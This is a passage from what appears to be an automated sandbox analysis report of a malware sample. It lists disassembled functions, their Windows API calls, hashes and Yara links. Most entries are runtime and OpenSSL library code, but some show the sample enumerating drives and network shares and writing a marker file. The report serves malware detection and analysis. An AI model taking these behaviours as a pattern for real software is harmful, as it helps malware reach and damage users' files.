                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BC2739
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00BC274C
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BC275F
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BC2772
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BC2785
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BC2798
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BC27AB
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BC27BE
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BC27D1
                                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00BB5146
                                                                                                                                                                        • __mtterm.LIBCMT ref: 00BB514F
                                                                                                                                                                          • Part of subcall function 00BB51B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BB5154,00BB3FFE,00C97990,00000014), ref: 00BB8B62
                                                                                                                                                                          • Part of subcall function 00BB51B7: _free.LIBCMT ref: 00BB8B69
                                                                                                                                                                          • Part of subcall function 00BB51B7: DeleteCriticalSection.KERNEL32(00C9AC00,?,?,00BB5154,00BB3FFE,00C97990,00000014), ref: 00BB8B8B
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00BB5174
                                                                                                                                                                        • __initptd.LIBCMT ref: 00BB5196
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BB519D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                                                        • Opcode ID: d587970450754fa2ccb19b1ffee2645b2d7a41badc03ebc22af0d24e0cca9a34
                                                                                                                                                                        • Instruction ID: e7db26d6b91c73aa4ec8b7bcdf1d3132eccb0b12d980bfa91ab4ef222d73726a
                                                                                                                                                                        • Opcode Fuzzy Hash: d587970450754fa2ccb19b1ffee2645b2d7a41badc03ebc22af0d24e0cca9a34
                                                                                                                                                                        • Instruction Fuzzy Hash: 0BF09036159B511FE63977B8BC07BFE2AD4EF01730B2106EAF064E51D1EFE0944185A6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB53AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB594A
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __mtinitlocknum.LIBCMT ref: 00BB8B09
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __amsg_exit.LIBCMT ref: 00BB8B15
                                                                                                                                                                          • Part of subcall function 00BB8AF7: EnterCriticalSection.KERNEL32(00BB3B69,?,00BB50D7,0000000D), ref: 00BB8B22
                                                                                                                                                                        • _free.LIBCMT ref: 00BB5970
                                                                                                                                                                          • Part of subcall function 00BB0BED: HeapFree.KERNEL32(00000000,00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00BB520D,00BB0CE9), ref: 00BB0C13
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5989
                                                                                                                                                                        • ___removelocaleref.LIBCMT ref: 00BB5998
                                                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 00BB59B1
                                                                                                                                                                        • _free.LIBCMT ref: 00BB59C4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626533743-0
                                                                                                                                                                        • Opcode ID: 6c150211f6204f7c0fc0f53a2c031299ff146f784f227d157f728f6d387ab5ac
                                                                                                                                                                        • Instruction ID: 45d4009dfcc91457d41ad81ed266767d2fe3491bc03d72771fe5fe2afc3e7fd3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c150211f6204f7c0fc0f53a2c031299ff146f784f227d157f728f6d387ab5ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 18015731502B00EBDE34AB68A846BFD72E4AF10731F2046DAE0A59A0D5CFF49981DA56
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE06A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00BE07C3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                        • API String ID: 601868998-2416195885
                                                                                                                                                                        • Opcode ID: eb8e500594dce08208b09c33b2ac75887143c9e040ace2681cad8bdd98f48584
                                                                                                                                                                        • Instruction ID: cb0d62b3a9f0f35387b5fdb6cd869697745f44e087101bfd881969e2d1a1ee9a
                                                                                                                                                                        • Opcode Fuzzy Hash: eb8e500594dce08208b09c33b2ac75887143c9e040ace2681cad8bdd98f48584
                                                                                                                                                                        • Instruction Fuzzy Hash: AE41C471A043459BD720EE55CC45BAFB3D8EF95348F0008AEF585D3141E7B5ED098BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C55D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 00C55D3D
                                                                                                                                                                          • Part of subcall function 00BB501F: GetLastError.KERNEL32(?,00BB3B69,00BB520D,00BB0CE9,?,?,00BB3B69,?), ref: 00BB5021
                                                                                                                                                                          • Part of subcall function 00BB501F: __calloc_crt.LIBCMT ref: 00BB5042
                                                                                                                                                                          • Part of subcall function 00BB501F: __initptd.LIBCMT ref: 00BB5064
                                                                                                                                                                          • Part of subcall function 00BB501F: GetCurrentThreadId.KERNEL32 ref: 00BB506B
                                                                                                                                                                          • Part of subcall function 00BB501F: SetLastError.KERNEL32(00000000,00BB3B69,00BB520D,00BB0CE9,?,?,00BB3B69,?), ref: 00BB5083
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00C55D60
                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00C55D7E
                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00C55DCD
                                                                                                                                                                        Strings
                                                                                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00C55D48, 00C55D6E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                        • API String ID: 3123740607-798102604
                                                                                                                                                                        • Opcode ID: b67e50eaf208f9b6d708a007f49b26c22874541cfa5f26044b8b0905114433ab
                                                                                                                                                                        • Instruction ID: b77cf80a6f444ced08a5c3286e03d4aa8bf591b7f1d5f4ea8292c50f53cefb5a
                                                                                                                                                                        • Opcode Fuzzy Hash: b67e50eaf208f9b6d708a007f49b26c22874541cfa5f26044b8b0905114433ab
                                                                                                                                                                        • Instruction Fuzzy Hash: 81112777511E156BEB213A259D15BFB73ECEF007A2F100065FE149A202E761DE8452E9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BF2FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fprintf_memset
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                                                                                        • Opcode ID: f9d23dc3a1882f823f8580a1daa0119e31064c56996b7c825ddf7370afe59761
                                                                                                                                                                        • Instruction ID: 7d535ab42806122821ff8f31fed3e56284c3ef4aab8a226f157db3d8ba5a9b63
                                                                                                                                                                        • Opcode Fuzzy Hash: f9d23dc3a1882f823f8580a1daa0119e31064c56996b7c825ddf7370afe59761
                                                                                                                                                                        • Instruction Fuzzy Hash: D0215772A043153BE620A9755C02FBB77D9DFC1B98F044494FF54A72C2EA61ED0942A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C51B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C539
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: 921c90cd205d9bae4ca3f1194e8e003a2b13a92710d4c6ea73507dc8b59ae310
                                                                                                                                                                        • Instruction ID: f151ff7700744b2f6806ed15c7c402b583f24147f224ea039344d6bb9e67df28
                                                                                                                                                                        • Opcode Fuzzy Hash: 921c90cd205d9bae4ca3f1194e8e003a2b13a92710d4c6ea73507dc8b59ae310
                                                                                                                                                                        • Instruction Fuzzy Hash: DA11E7B2A4032833DD2075696C87FEF77DCDB55B21F4100F6FA0CD2142E5A6955542E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BABA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00BABAAD
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00BABABE
                                                                                                                                                                        • UpdateWindow.USER32(00000000), ref: 00BABAC5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CreateShowUpdate
                                                                                                                                                                        • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 2944774295-3503800400
                                                                                                                                                                        • Opcode ID: 7d9cd1e4e993737110df545c54c79712b5db4b7dc1681609e10173efe2aae960
                                                                                                                                                                        • Instruction ID: 8dccd9c90624a1bd25f94071e424aac5596180f5c31e1baf24dd52222bbc3a7f
                                                                                                                                                                        • Opcode Fuzzy Hash: 7d9cd1e4e993737110df545c54c79712b5db4b7dc1681609e10173efe2aae960
                                                                                                                                                                        • Instruction Fuzzy Hash: 80E04F356817647BE7315714BC4BFDE3554E702F11F304159FA017E2E0C7E169818A8C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA0BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00BA0C12
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00BA0C39
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA0C4C
                                                                                                                                                                        • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00BA0C63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 364255426-0
                                                                                                                                                                        • Opcode ID: d4c9f90890a8c63e174444fd78be0a359c13f809a505e95bc46713bfdb07f65d
                                                                                                                                                                        • Instruction ID: f884df3073e0a2773f9ffaba21243a7c00c42d531f07db4521c28df61369c139
                                                                                                                                                                        • Opcode Fuzzy Hash: d4c9f90890a8c63e174444fd78be0a359c13f809a505e95bc46713bfdb07f65d
                                                                                                                                                                        • Instruction Fuzzy Hash: C091E17561C3419FD728EF68C891B6BB7E1FF85714F1489ADF88A87280E770A940CB52
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD16EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00BD1726
                                                                                                                                                                        • _strlen.LIBCMT ref: 00BD1734
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • _strnlen.LIBCMT ref: 00BD17BF
                                                                                                                                                                        • __lock.LIBCMT ref: 00BD17D0
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00BD17DB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2168648987-0
                                                                                                                                                                        • Opcode ID: 5545da5c79bed4a77cdd16a22a2e492fd293c0ecdd969c4e75f8694ef6093086
                                                                                                                                                                        • Instruction ID: 96f21b28af747124c3454cde1262dd79e9543e5e195f5fd3320da5485e7d127b
                                                                                                                                                                        • Opcode Fuzzy Hash: 5545da5c79bed4a77cdd16a22a2e492fd293c0ecdd969c4e75f8694ef6093086
                                                                                                                                                                        • Instruction Fuzzy Hash: 11319A71655215BBDB216B6CDC41BEEB6D89F05B20F1409D6F814EB392FFB4CD0086A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA0A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLogicalDrives.KERNEL32 ref: 00BA0A75
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00C90234,00000002), ref: 00BA0AE2
                                                                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 00BA0AF9
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00BA0B02
                                                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 00BA0B1B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1668002558.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668146442.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668162095.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668180090.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1668215859.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2560635915-0
                                                                                                                                                                        • Opcode ID: 4836c1db1d25a00ecb8c0fdc61dddce2dc79497ec479d8292a0a8900f1198fd6
                                                                                                                                                                        • Instruction ID: afb02862e75e84cb15e9f39cf73499b4d7486d717fe9dc49682c170c3b007fb5
                                                                                                                                                                        • Opcode Fuzzy Hash: 4836c1db1d25a00ecb8c0fdc61dddce2dc79497ec479d8292a0a8900f1198fd6
                                                                                                                                                                        • Instruction Fuzzy Hash: 1441C17150C3409FC710EF68C885B5FBBE4EB99719F500A6CF085962A1D7B5C548CB93
                                                                                                                                                                        Uniqueness

